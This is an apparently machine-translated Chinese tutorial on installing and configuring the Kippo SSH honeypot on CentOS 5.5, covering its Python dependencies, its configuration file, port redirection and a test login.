如何在CentOS 5.5上设置Kippo SSH Honeypot
Kippo是一种中等的交互式SSHHoneypot,旨在记录暴力攻击,最重要的是攻击者执行的整个shell交互。 Kippo是灵感,但不是基于Kojoney。 如果您需要更多有关Kippo的信息,请访问其官方网站http://code.google.com/p/kippo/ 。 本教程将介绍如何在CentOS 5.5服务器上编译和安装Kippo。
我不会保证这将为您工作!
Python 2.6安装
如您所知,CentOS只附带了Python 2.4,因此您需要使用以下链接中的教程安装Python 2.6:
http://www.geekymedia.com/tech-articles/rhel5-centos5-rpms-for-python-2-5-and-2-6/ 。
重要笔记!:
1)只需安装所需版本的RPM。 您至少需要基本的python版本包和libs包。
2)要启动Python 2.6,在命令行中键入python26而不是python。 (您原来的Python 2.4仍然安装。)
3)如果要使用setuptools安装软件包,请确保使用正确的python版本。 (ie python26 setup.py install)
双绞线,Zope接口和Pycrypto安装
Twisted是以Python编写的事件驱动的网络引擎,并根据MIT许可证进行许可。 扭曲的项目各种支持TCP,UDP,SSL / TLS,组播,Unix套接字,大量协议(包括HTTP,NNTP,IMAP,SSH,IRC,FTP等)等等。
cd /tmp
wget http://twistedmatrix.com/Releases/Twisted/10.2/Twisted-10.2.0.tar.bz2
tar -xvf Twisted-10.2.0.tar.bz2
cd Twisted-10.2.0
python26 setup.py build
python26 setup.py install
Zope是一种主要用Python编程语言编写的开源Web应用服务器。
cd /tmp
wget http://www.zope.org/Products/ZopeInterface/3.3.0/zope.interface-3.3.0.tar.gz
tar -xvf zope.interface-3.3.0.tar.gz
cd zope.interface-3.3.0
python26 setup.py build
python26 setup.py install
Pycrypto是一个加密算法和协议的集合,可以从Python中实现。
cd /tmp
wget wget http://www.amk.ca/files/python/crypto/pycrypto-2.0.1.tar.gz
tar -xvf pycrypto-2.0.1.tar.gz
cd pycrypto-2.0.1
python26 setup.py build
python26 setup.py install
ASN.1类型和编解码器(BER,CER,DER)在Python编程语言中的实现。
cd /tmp
wget http://sourceforge.net/projects/pyasn1/files/pyasn1-devel/0.0.12a/pyasn1-0.0.12a.tar.gz/download
tar -xvf pyasn1-0.0.12a.tar.gz
cd pyasn1-0.0.12a
python26 setup.py build
python26 setup.py install
创建常规用户
Kippo不能在root用户下运行! 所以我们必须创建一个普通用户。
useradd kippouser
下载Kippo源码包
您需要从http://kippo.googlecode.com下载最新版本的Kippo源码包。
su - kippouser
wget http://kippo.googlecode.com/files/kippo-0.5.tar.gz
tar -xvf kippo-0.5.tar.gz
cd kippo-0.5
配置Kippo
vi kippo.cfg
# # Kippo configuration file (kippo.cfg) # [honeypot] # IP addresses to listen for incoming SSH connections. # # (default: 0.0.0.0) = any address #ssh_addr = 0.0.0.0 # Port to listen for incoming SSH connections. # # (default: 2222) ssh_port = 2222 # Hostname for the honeypot. Displayed by the shell prompt of the virtual # environment. # # (default: sales) hostname = sales # Directory where to save log files in. # # (default: log) log_path = log # Directory where to save downloaded (malware) files in. # # (default: dl) download_path = dl # Directory where virtual file contents are kept in. # # This is only used by commands like 'cat' to display the contents of files. # Adding files here is not enough for them to appear in the honeypot - the # actual virtual filesystem is kept in filesystem_file (see below) # # (default: honeyfs) contents_path = honeyfs # File in the python pickle format containing the virtual filesystem. # # This includes the filenames, paths, permissions for the whole filesystem, # but not the file contents. This is created by the createfs.py utility from # a real template linux installation. # # (default: fs.pickle) filesystem_file = fs.pickle # Directory for miscellaneous data files, such as the password database. # # (default: data_path) data_path = data # Directory for creating simple commands that only output text. # # The command must be placed under this directory with the proper path, such # as: # txtcmds/usr/bin/vi # The contents of the file will be the output of the command when run inside # the honeypot. # # In addition to this, the file must exist in the virtual # filesystem {filesystem_file} # # (default: txtcmds) txtcmds_path = txtcmds # Public and private SSH key files. If these don't exist, they are created # automatically. # # (defaults: public.key and private.key) public_key = public.key private_key = private.key # Initial root password. Future passwords will be stored in # {data_path}/pass.db # # (default: 123456) password = 123456 # IP address to bind to when opening outgoing connections. Used exclusively by # the wget command. # # (default: not specified) #out_addr = 0.0.0.0 # Sensor name use to identify this honeypot instance. Used by the database # logging modules such as mysql. # # If not specified, the logging modules will instead use the IP address of the # connection as the sensor name. # # (default: not specified) #sensor_name=myhostname # Fake address displayed as the address of the incoming connection. # This doesn't affect logging, and is only used by honeypot commands such as # 'w' and 'last' # # If not specified, the actual IP address is displayed instead (default # behaviour). # # (default: not specified) #fake_addr = 192.168.66.254 # MySQL logging module # # Database structure for this module is supplied in doc/sql/mysql.sql # # To enable this module, remove the comments below, including the # [database_mysql] line. #[database_mysql] #host = localhost #database = kippo #username = kippo #password = secret
开始Kippo
./start.sh
日志文件
默认情况下,kippo输出将被重定向到文件log / kippo.log
。 要查看Kippo日志记录数据,请使用以下命令:
tail -f log/kippo.log
注意:如何使Kippo能够访问世界!
默认情况下,Kippo正在端口2222上运行。如果在Windows上运行,端口22通常是免费的,并且可以在该端口上运行kippo。 在linux上,仅限root用户端口22,除非您这样做(引用#twisted):
iptables -t nat -A PREROUTING -i IN_IFACE -p tcp --dport 22 -j REDIRECT --to-port 2222
将IN_IFACE替换为真实的接口名称,如eth0!
测试
使用root用户名和123456作为密码连接到端口2222上的Kippo服务器。
ssh 127.0.0.1 -p 2222 -l root
成功登录后,您必须看到以下横幅:
sales:~#
链接
Honeynet项目: http : //www.honeynet.org/
Honeypot: http : //en.wikipedia.org/wiki/Honeypot_(computing)
Kippo项目: http : //kippo.googlecode.com/
伊朗Honeynet项目: http : //www.honeynet.ir/
CentOS: http : //www.centos.org/